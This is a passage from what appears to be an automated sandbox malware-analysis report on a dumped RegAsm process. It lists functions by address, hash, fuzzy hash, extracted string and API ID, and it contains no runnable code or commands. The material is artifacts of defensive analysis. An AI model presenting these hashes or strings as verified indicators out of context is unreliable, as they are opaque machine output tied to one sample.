                          • Opcode ID: 46c5b9ddc5b99c63ac287f401b6f8556ddc808f31fd7f0323445c414bf22c29c
                          • Instruction ID: f9c2e87604e5b9b62a4ee05c4a3bcffcae0d3c1aa8820bb697bee025421a49ce
                          • Opcode Fuzzy Hash: 46c5b9ddc5b99c63ac287f401b6f8556ddc808f31fd7f0323445c414bf22c29c
                          • Instruction Fuzzy Hash: BB3246B5A00606CFCB14CF65C8922FBBBB1FF56310F18866DD8559B381E338A981CB95
                          Function 00440210 Relevance: 1.8, Strings: 1, Instructions: 586COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: bD
                          • API String ID: 0-341964956
                          • Opcode ID: e99359dc99a8bf858c3b7c63ae7db808fb00536d9867249c0ed49bce75a1a9b6
                          • Instruction ID: 911d2f89f39eaf0008d7b756394c97734fafba8bae24048753eae8f52f09a2ab
                          • Opcode Fuzzy Hash: e99359dc99a8bf858c3b7c63ae7db808fb00536d9867249c0ed49bce75a1a9b6
                          • Instruction Fuzzy Hash: 3A022139A48211CFD704CF28D8906AAB7E2FF8A310F0A897DD98587351D738DC55CB96
                          Function 004402F0 Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: bD
                          • API String ID: 0-341964956
                          • Opcode ID: 04e2cddd21c82fc03b3f98c5b853d8b90686f0363848fa8e347febc4d9bcb0a9
                          • Instruction ID: d62e37b0ccf4a74103ea6b78b2ff9ea56fd3d2c5454dac3654949ab233673ec3
                          • Opcode Fuzzy Hash: 04e2cddd21c82fc03b3f98c5b853d8b90686f0363848fa8e347febc4d9bcb0a9
                          • Instruction Fuzzy Hash: C1022F39A48311CFDB04CF38D8906AAB7E2EF8A314F0A897DD98587351D738D855CB96
                          Function 004235F0 Relevance: 1.7, APIs: 1, Instructions: 241comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.OLE32(00443598,00000000,00000001,00443588), ref: 00423619
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateInstance
                          • String ID:
                          • API String ID: 542301482-0
                          • Opcode ID: f7b2f4b760a81e6f9b6e5f6b2e8cc5017b6c2693f137bd3191b76f93f8daa911
                          • Instruction ID: 7ddeebd1315078c88221df5178ba7910bcfe2ee1bb9768e595efda2fedcb572e
                          • Opcode Fuzzy Hash: f7b2f4b760a81e6f9b6e5f6b2e8cc5017b6c2693f137bd3191b76f93f8daa911
                          • Instruction Fuzzy Hash: 5151CEB0700214ABDB20AF24DC86B7733B8EF8575AF448559F9858B390E37CDA01C76A
                          Function 004297D0 Relevance: 1.7, Strings: 1, Instructions: 475COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: |1[3O=]?O9H;(EFG
                          • API String ID: 0-2327365969
                          • Opcode ID: 498f6e79ce40924af8d936b1f52076ceafa217d31f6103c9ab7f940ef28ac6df
                          • Instruction ID: 2a0eead5d1c0089b4ab363994fe3972e8cdfd85871b92c54397a6d948d4edf12
                          • Opcode Fuzzy Hash: 498f6e79ce40924af8d936b1f52076ceafa217d31f6103c9ab7f940ef28ac6df
                          • Instruction Fuzzy Hash: E0E11275E002288BDB14CFA4E8917EEBBB1FF45304F15416DD946AB381EB789E06CB80
                          Function 00423850 Relevance: 1.7, Strings: 1, Instructions: 432COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: lmno
                          • API String ID: 0-919139636
                          • Opcode ID: 50c40eb443a0e3030ea8cf5a1a4e0f710fbcfa788eae5434240e0c8aab7c8de9
                          • Instruction ID: 1a3b389284ba562a87a77495ad854079d758d6bb5ca4be60c9ad11856d53808d
                          • Opcode Fuzzy Hash: 50c40eb443a0e3030ea8cf5a1a4e0f710fbcfa788eae5434240e0c8aab7c8de9
                          • Instruction Fuzzy Hash: 38B15976A042205BD7209F24D85263BB7F1EFD2324F59852EE4C597382E77CEA01879A
                          Function 0041EB80 Relevance: 1.6, Strings: 1, Instructions: 389COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: dg
                          • API String ID: 0-2476624039
                          • Opcode ID: 70ec5b397a7f9d3380583bba9cdb7db1c77063673f7266ca13b8b3f9d3bff3c1
                          • Instruction ID: a777d1112300ed0328085d988200fc2b3161b415096455110393fd80377dd20e
                          • Opcode Fuzzy Hash: 70ec5b397a7f9d3380583bba9cdb7db1c77063673f7266ca13b8b3f9d3bff3c1
                          • Instruction Fuzzy Hash: A1B1DF79A183018BC724CF29C8513ABB7F1EF95314F48892DE8D99B390E738D945C79A
                          Function 00406180 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,
                          • API String ID: 0-3772416878
                          • Opcode ID: 42698df11754288f7c7e22d86eca644924014b76b5d582c7a606c14b27339af4
                          • Instruction ID: 154771c752a932779d5afa772b51c111bd756c018d561075520692a7b9a2d090
                          • Opcode Fuzzy Hash: 42698df11754288f7c7e22d86eca644924014b76b5d582c7a606c14b27339af4
                          • Instruction Fuzzy Hash: C8B149701083819FC321DF58C98061BFBE0AFA9704F444A6DE5DA97782D635E918CB6B
                          Function 0040B1D0 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: LJ
                          • API String ID: 0-1839849906
                          • Opcode ID: 32e2b2a4043bf6c096733809b1c40c94b04732bdd8f6a7cc70eba95ff2f9126b
                          • Instruction ID: 7d08a5681504b9b7e6a48ed61d136dcf9633ff4ddde9a0c90a6c0ffdbab556b4
                          • Opcode Fuzzy Hash: 32e2b2a4043bf6c096733809b1c40c94b04732bdd8f6a7cc70eba95ff2f9126b
                          • Instruction Fuzzy Hash: D5D1E9B4151B40DBE3748F26E984787BBF1BB42754F608E1CD1EA2BA85C778A005CF99
                          Function 0041C4BC Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8-
                          • API String ID: 0-3812798818
                          • Opcode ID: 20fc81fce02fe6b391ff2be7b83f0511e06d7cf125620e5bac4aa39a2fb39c10
                          • Instruction ID: a25670a122ddcdfd22edf8418b3041ba70b3d4310d6e9ffa78eb72c008a34486
                          • Opcode Fuzzy Hash: 20fc81fce02fe6b391ff2be7b83f0511e06d7cf125620e5bac4aa39a2fb39c10
                          • Instruction Fuzzy Hash: B06125729443218BC3259F24C8902ABB7F2FFE6750F1A965DE8D52B3A4E3358D41C785
                          Function 0042B580 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: "
                          • API String ID: 0-123907689
                          • Opcode ID: d605f69cb6a61cba6e277e74b20d9a248e2b5eec550f027b6d34fa71407e500c
                          • Instruction ID: a83cd635106bba80700be3c932c2028a4828255dda0c33b642da19134739f146
                          • Opcode Fuzzy Hash: d605f69cb6a61cba6e277e74b20d9a248e2b5eec550f027b6d34fa71407e500c
                          • Instruction Fuzzy Hash: 8871E9327047344BC7249D6DA88022B77D6EBC5730F99872AE8B88B3D5D7788C4587CA
                          Function 00441720 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: %*+(
                          • API String ID: 2994545307-3233224373
                          • Opcode ID: 7228b157b8eb77ce6c7dd744172b13d4fd0337b8f37e9e8f95ac9db7c94dd113
                          • Instruction ID: e759ce7f0c2a445e802c7890bbd8bf261f8ae77e8e9d52c3cb1d641808a64f00
                          • Opcode Fuzzy Hash: 7228b157b8eb77ce6c7dd744172b13d4fd0337b8f37e9e8f95ac9db7c94dd113
                          • Instruction Fuzzy Hash: A181DF756042019FE718DF29C891A2BB7E2FFD9344F19852EE5848B361DB39EC41CB4A
                          Function 0041B1FA Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: K7
                          • API String ID: 2994545307-4265185514
                          • Opcode ID: 854bedc942d704704795661a3ad1bfdb0958c756f2dc05a7bcc0a66d4eefe7f2
                          • Instruction ID: fe9f68dd6caef55a4fd82ba992068611efb3462d70c4cbc8eb857c667fd0fb75
                          • Opcode Fuzzy Hash: 854bedc942d704704795661a3ad1bfdb0958c756f2dc05a7bcc0a66d4eefe7f2
                          • Instruction Fuzzy Hash: 6E5105743053049FD7248F29C8917BFF7A2EB9A324F29D62DD4860B292C33958458BDE
                          Function 0041C225 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8-
                          • API String ID: 0-3812798818
                          • Opcode ID: 0ca0e89c1ad262b6a6c440f5f203b2743f750613855566febdcb123336d30ef8
                          • Instruction ID: e011ceead91074b7cc013e3f585e65df6e98f08ec6e89e21a7cc2fe669adb6fa
                          • Opcode Fuzzy Hash: 0ca0e89c1ad262b6a6c440f5f203b2743f750613855566febdcb123336d30ef8
                          • Instruction Fuzzy Hash: 3D6100715483218BC720DF28C8D06ABB7F2FF96750F19965DE8D15B368E7388841C786
                          Function 0041CDE0 Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: _
                          • API String ID: 0-701932520
                          • Opcode ID: ea82e861296f54f02b876c034cb7da8e08a6f47831a7466b4fdab98e1bae1d94
                          • Instruction ID: 5e629cd5a4b8a39bce27e5c3485168bef556bfb607e8c52a14ceb3c4a70aec2a
                          • Opcode Fuzzy Hash: ea82e861296f54f02b876c034cb7da8e08a6f47831a7466b4fdab98e1bae1d94
                          • Instruction Fuzzy Hash: 7E71F71621564109D72CDF748893337BAD6DF84709F2891BFC956CFA9BE93CC2028B89
                          Function 0041A783 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: gfff
                          • API String ID: 2994545307-1553575800
                          • Opcode ID: d4706cb9d9b86324b9686a1075bb5e92e46f9864c8ac80011f8ec985681e92ed
                          • Instruction ID: c7ac6c206ebcf67d1ef8b55e3b2ef8f9a91c8942a348e493453017bf745ecb34
                          • Opcode Fuzzy Hash: d4706cb9d9b86324b9686a1075bb5e92e46f9864c8ac80011f8ec985681e92ed
                          • Instruction Fuzzy Hash: 606147B56052504BD319CB28C8517BB77E2EBC5328F08863EE096CB3D5EB78C546878A
                          Function 0041FD50 Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                          Download Yara Rule
                          Strings
                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0041FE22
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          • API String ID: 0-442858466
                          • Opcode ID: 06249b3145be53e11267c2cf2d9ea3bd6f0f09238b8304bbbbe1bbfad56d3055
                          • Instruction ID: 1a389e364e849dd5f6a7dd31dd641fce1bd1149b36441138696bb40b5ef6ef00
                          • Opcode Fuzzy Hash: 06249b3145be53e11267c2cf2d9ea3bd6f0f09238b8304bbbbe1bbfad56d3055
                          • Instruction Fuzzy Hash: DE61F83764968187D7288E3C5C512EABA935FD3334B3D837BE4B1873E1C669894B4349
                          Function 0041AFC2 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: K7
                          • API String ID: 2994545307-4265185514
                          • Opcode ID: 867195d74dc1159dbf9a996b73e7eb7693fbb1a1e37db4605eb6ee8acb1458c8
                          • Instruction ID: d32e7d3792677d9385e059763a7ef5fa823f6309972ca4856a10a181381cda46
                          • Opcode Fuzzy Hash: 867195d74dc1159dbf9a996b73e7eb7693fbb1a1e37db4605eb6ee8acb1458c8
                          • Instruction Fuzzy Hash: 8F513970305300AFD765CF29C8927ABB7A2EF95310F6DC52ED48607292C7395C46CB9A
                          Function 0042C81E Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: >2%8
                          • API String ID: 0-3601729801
                          • Opcode ID: 2ee780600435e65269fe4e80ce9b83c80dd633bf5fc20d5ece1fc62b2f340194
                          • Instruction ID: 25f1567813761ad97d2965320a888a75774facb01b46e5cde3064720964745c5
                          • Opcode Fuzzy Hash: 2ee780600435e65269fe4e80ce9b83c80dd633bf5fc20d5ece1fc62b2f340194
                          • Instruction Fuzzy Hash: A54127E46047918AE3228B3994D07B3FFE0AF67305F58158EE1EB47353C37928498759
                          Function 004411E0 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: 5|iL
                          • API String ID: 2994545307-1880071150
                          • Opcode ID: f859b1e3a86568bcd84bd1bc52340373328660a03d92756c22bb718cb172e1e6
                          • Instruction ID: be18f974b8193378ca69b65b54ee200706267250bbd1d07609027685d17a46dd
                          • Opcode Fuzzy Hash: f859b1e3a86568bcd84bd1bc52340373328660a03d92756c22bb718cb172e1e6
                          • Instruction Fuzzy Hash: 05412471315301ABF714DF29EC82B3AB7A6FB86344F18842DE580D72A0E678A850874D
                          Function 00424DA1 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: p8
                          • API String ID: 0-2130562967
                          • Opcode ID: 1c13aef119dfada8b7544f08803ac15a44fcd6b6b6c54346d030ead43caf1b11
                          • Instruction ID: 396cf621a9295f03ee0f8f194c331b0e18ebba4edf0cc430ad609cf39bee8afd
                          • Opcode Fuzzy Hash: 1c13aef119dfada8b7544f08803ac15a44fcd6b6b6c54346d030ead43caf1b11
                          • Instruction Fuzzy Hash: 8131BCB6E107288B8B18CFE9E8904AEBFB1FB15314F25522DD9617B394D7781900CF85
                          Function 004077D0 Relevance: .8, Instructions: 841COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ce35907d57f9f54abcfd436ffff034d089d242f90efa385d37cc7449ac22ee44
                          • Instruction ID: feefcd8f1536a5f1d2cc18da86cc08fb87ddb41a3bc1dae01e43e37ddbe70314
                          • Opcode Fuzzy Hash: ce35907d57f9f54abcfd436ffff034d089d242f90efa385d37cc7449ac22ee44
                          • Instruction Fuzzy Hash: 82529E31A087118BC725DF18D98067AB3E1FFC4304F25893ED9D6A7385D738A956CB8A
                          Function 00402A70 Relevance: .7, Instructions: 674COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08eae610eeda58969c5ed71f99fa41f332953503138e122d5d26e54d026c5d25
                          • Instruction ID: 1efd3675d8875478b850b54804e16fef475d3d5ae18289fe68986804587af791
                          • Opcode Fuzzy Hash: 08eae610eeda58969c5ed71f99fa41f332953503138e122d5d26e54d026c5d25
                          • Instruction Fuzzy Hash: 7052E2315083458FCB15CF24C1906AABBE1FF89304F198A7EE8996B381D779E949CB85
                          Function 00406CC0 Relevance: .7, Instructions: 670COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0db90b9942ec8ecdca5fb553ea7776a758bf863260735089a4a8bb25b1e726cf
                          • Instruction ID: 67d713257c309c85736cec1845cc1d9a4873a4ee673940014eb2de2a2a8491e0
                          • Opcode Fuzzy Hash: 0db90b9942ec8ecdca5fb553ea7776a758bf863260735089a4a8bb25b1e726cf
                          • Instruction Fuzzy Hash: F3528F70D08B849EEB35CB24C4847A7BBE1AB51314F14893EC5EB16BC2C27DB885C75A
                          Function 00403490 Relevance: .6, Instructions: 619COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14a546b8130f87ce6225e4779f8c82e36b45d4d1007f6213355f0bce4df59134
                          • Instruction ID: 5ec806bfc4fdcaa9b19c04f0a6f3cac88961a43f3209f60bc56503115d8e12a2
                          • Opcode Fuzzy Hash: 14a546b8130f87ce6225e4779f8c82e36b45d4d1007f6213355f0bce4df59134
                          • Instruction Fuzzy Hash: 494254B0614B108FC338CF29C68052ABBF5BB45711B608A2ED69797F91D73AF945CB18
                          Function 004213AD Relevance: .5, Instructions: 528COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a57bc0d18e038412e411abbd3359c0c8b5e5da86444efddb2a407b477d55d57
                          • Instruction ID: 734486481cff5e4e0e5087a3076c9d25f489d67d58a94ac154b3a431baae40d3
                          • Opcode Fuzzy Hash: 2a57bc0d18e038412e411abbd3359c0c8b5e5da86444efddb2a407b477d55d57
                          • Instruction Fuzzy Hash: A2328021508BC18ED3268A3C8845356BFD16B66328F1C879DD4E98F7D3C36AD14BC7A6
                          Function 00405CC0 Relevance: .4, Instructions: 399COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8fd375bf3516db857a5b8f4e9d18a7a4dde794f11d07c13cb422ee88cba72c16
                          • Instruction ID: b783bebdde46e3b8b7be59880dd73a7ac46d541786670248ca7f8f7eedf55a95
                          • Opcode Fuzzy Hash: 8fd375bf3516db857a5b8f4e9d18a7a4dde794f11d07c13cb422ee88cba72c16
                          • Instruction Fuzzy Hash: EBE17D712087418FD720CF29C880A6BFBE1EF99304F44882DF4D697792E679E954CB96
                          Function 00418890 Relevance: .4, Instructions: 364COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1aa9ee82479606d79c78ff6beaa22b27bc750450671219b2b8445c66eccead89
                          • Instruction ID: 5ab32b3bfb9b1d3f5e842bd634ed02594806a4d9f59ef2a3d1d32b65e045bc5c
                          • Opcode Fuzzy Hash: 1aa9ee82479606d79c78ff6beaa22b27bc750450671219b2b8445c66eccead89
                          • Instruction Fuzzy Hash: 448123B5904211DBC7209F18DC826B773B0FF96358F08452EF9864B392FB38A950C79A
                          Function 0042C7C6 Relevance: .3, Instructions: 332COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61226a05d3d946f32a87627e2cbad7c3a2ce9d5b46345b89293357b1a80158a5
                          • Instruction ID: dce13f4c60ded9296c87edc5b0b8b9a170e3a9eb240bcaa2e0a89ebf88acd714
                          • Opcode Fuzzy Hash: 61226a05d3d946f32a87627e2cbad7c3a2ce9d5b46345b89293357b1a80158a5
                          • Instruction Fuzzy Hash: BCB13A32B05B528BD728CA28D4E1277B7D2EFA5320769862FC4A70B7D1C738B801D759
                          Function 00406830 Relevance: .3, Instructions: 303COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21eef490a741124f975e333f9f41dbbf26a33a26c0eb5ce82e57c9491807e06d
                          • Instruction ID: 17bfb6383042b0ad677a874368420975a50fd98476fa640b97db45d1772a28ea
                          • Opcode Fuzzy Hash: 21eef490a741124f975e333f9f41dbbf26a33a26c0eb5ce82e57c9491807e06d
                          • Instruction Fuzzy Hash: 08C15CB2A487418FC360CF28DC867ABB7E1FF85318F09492DD1DAD6242E778A155CB46
                          Function 00408670 Relevance: .3, Instructions: 301COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4f95e4135a5855b4899df90ff2c4b2102b2866d8fdf2f026081c20a565ed87b
                          • Instruction ID: c4dba0f52655684e45db77cbfbc82a2fd5864c62d6828ffe9689b2d09c5d986a
                          • Opcode Fuzzy Hash: d4f95e4135a5855b4899df90ff2c4b2102b2866d8fdf2f026081c20a565ed87b
                          • Instruction Fuzzy Hash: 9C916B72A0826547C7206D29CD801AB7793ABC1310F69CA3AD8E5BB3DDEF3CD90646C5
                          Function 004388B0 Relevance: .3, Instructions: 284COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 90def7e7967b5ac5e8f1ce832c6c7e9234fa4de33fc9e0ca97dbf0b13ef28955
                          • Instruction ID: ae5b627df059e6d32b5427388680294cef765974f1d1fef8568235bb8ce60915
                          • Opcode Fuzzy Hash: 90def7e7967b5ac5e8f1ce832c6c7e9234fa4de33fc9e0ca97dbf0b13ef28955
                          • Instruction Fuzzy Hash: C5B10F719087C18FCB12867CC8413ADFFB1AB5B314F1C829EE5A59B386C63E5806C766
                          Function 0040B769 Relevance: .3, Instructions: 284COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f9eaa333ef3614d223f596bd0b06860529e28dad87bedf57836b6370be27ef0
                          • Instruction ID: 700c4c60dce8ef70e102e0c470773ea2ad0dfaf4d7bf26b266cb7fbe973ff51a
                          • Opcode Fuzzy Hash: 6f9eaa333ef3614d223f596bd0b06860529e28dad87bedf57836b6370be27ef0
                          • Instruction Fuzzy Hash: 05A1CCBA600B01CFC7248F25DC95B67B7F6FF89301F15892DD4AA83AA0DB34E9058B44
                          Function 0043CB80 Relevance: .3, Instructions: 277COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
